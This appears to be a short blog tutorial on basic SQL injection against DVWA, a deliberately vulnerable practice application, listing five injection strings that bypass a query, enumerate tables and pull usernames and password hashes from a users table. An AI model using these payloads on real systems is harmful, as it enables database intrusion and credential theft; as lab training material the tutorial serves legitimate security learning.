How to do a basic SQL injection

Here is a video showing you how to perform and SQL injection the vulnerable application is called DVWA and can be downloaded from the following address: http://www.dvwa.co.uk/




Here are the commands used in the above video

1' or '1'='1'#
1' or 1=1 union select database(), user() #
1' and 1=1 union select null, table_name from information_schema.tables #
1' and 1=1 union select null, table_name from information_schema.tables where table_name like 'user%'#
1' and 1=1 union select user, password from users #

0 comments: